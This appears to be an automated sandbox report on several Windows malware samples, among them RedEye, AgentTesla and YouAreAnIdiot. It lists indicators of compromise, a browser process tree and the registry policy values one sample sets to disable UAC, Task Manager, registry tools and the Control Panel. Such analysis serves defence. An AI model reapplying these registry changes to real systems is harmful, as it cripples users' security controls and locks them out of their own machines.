pid Process 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3280 msedge.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3280 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 2352 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2352 AUDIODG.EXE Token: SeDebugPrivilege 1228 Wave Browser.exe Token: SeDebugPrivilege 4552 Wave Browser.exe Token: SeDebugPrivilege 2664 Wave Browser.exe Token: SeDebugPrivilege 4868 SWUpdater.exe Token: SeDebugPrivilege 4868 SWUpdater.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 5084 ButterflyOnDesktop.exe 3280 msedge.exe 3280 msedge.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
pid Process 6608 AgentTesla.exe 7736 AgentTesla.exe 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 6156 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3280 wrote to memory of 5048 3280 msedge.exe 83 PID 3280 wrote to memory of 5048 3280 msedge.exe 83 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2976 3280 msedge.exe 85 PID 3280 wrote to memory of 2976 3280 msedge.exe 85 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 -
System policy modification 1 TTPs 11 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1" RedEye.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System RedEye.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" RedEye.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer RedEye.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer RedEye.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" RedEye.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" RedEye.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "4" RedEye.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System RedEye.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1214735818472558646/1270183447918415902/robloxapp-20240802-1831583.wmv?ex=66b2c604&is=66b17484&hm=55b47e3987876be3720559b84781030d4a7f07fe97e2f75d58130ab55a74205c&1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9bce46f8,0x7ffd9bce4708,0x7ffd9bce47182⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:22⤵PID:2580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:82⤵PID:2496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵PID:3864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:82⤵PID:1248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:12⤵PID:372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:1692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5192 /prefetch:82⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:12⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6032 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:1840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:12⤵PID:3828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:12⤵PID:3492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:12⤵PID:1248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:12⤵PID:2164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5240 /prefetch:82⤵PID:1552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5880 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:12⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵PID:2676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:12⤵PID:4552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:12⤵PID:3360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6780 /prefetch:82⤵PID:2456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4572
-
-
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 712 -s 13683⤵
- Program crash
PID:3708
-
-
-
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1684
-
-
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3248
-
-
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4532 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 11723⤵
- Program crash
PID:5052
-
-
-
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 11723⤵
- Program crash
PID:4824
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6428 /prefetch:82⤵PID:912
-
-
